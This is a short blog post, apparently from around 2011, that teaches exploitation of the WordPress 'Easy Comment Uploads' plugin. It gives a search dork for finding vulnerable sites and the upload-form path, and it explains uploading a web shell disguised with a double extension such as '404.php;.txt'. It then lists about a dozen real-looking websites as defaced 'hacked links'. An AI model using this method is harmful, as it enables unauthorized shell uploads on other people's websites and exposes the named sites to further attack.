Exploit Wordpress "/easy-comment-uploads/upload-form.php".
Find Out Sites from this Dork
Dork : "/easy-comment-uploads/upload-form.php"
*|_Exploit_|*
http://[localhost]/[path]/easy-comment-uploads/upload-form.php
http://[localhost]/easy-comment-uploads/upload-form.php
For example
File Extention [.txt],[.jpg],[gif],[bmp]
Preview Your Upload Page
In my case i upload hitcher1.jpg
site/wp-content/uploads/[years]/[month]/[yourshell]
example: site/wp-content/uploads/2011/06/404.php;.txt
For example hacked links
_____________________________________________________
http://www.punjabicomments.co.cc/wp-content/uploads/2011/11/hitcher1.jpg
http://www.deathvalleymag.com/wp-content/uploads/2011/11/hitcher1.jpg
http://www.serpholicmedia.com/wp-content/uploads/2011/11/hitcher1.jpg
http://eleventigers.net/111/wp-content/uploads/2011/11/hitcher1.jpg
http://www.recycledbride.com/blog/wp-content/uploads/2011/11/hitcher1.jpg
http://www.recycledbride.com/blog/wp-content/uploads/2011/11/hitcher1.jpg
http://www.mysodes.tv/wp-content/uploads/2011/11/hitcher1.jpg
http://objekt.com.au/wp-content/uploads/2011/11/hitcher1.jpg
http://h00rj.com/wp-content/uploads/2011/11/hitcher1.jpg
http://www.chetthedog.com/wp-content/uploads/2011/11/hitcher1.jpg
http://maratona.mobi/wp-content/wp-content/uploads/2011/11/hitcher1.jpg
____________________________________________________
Me and my friend were arguing about an issue similar to this! Now I know that I was right. lol! Thanks for the information you post.
ReplyDelete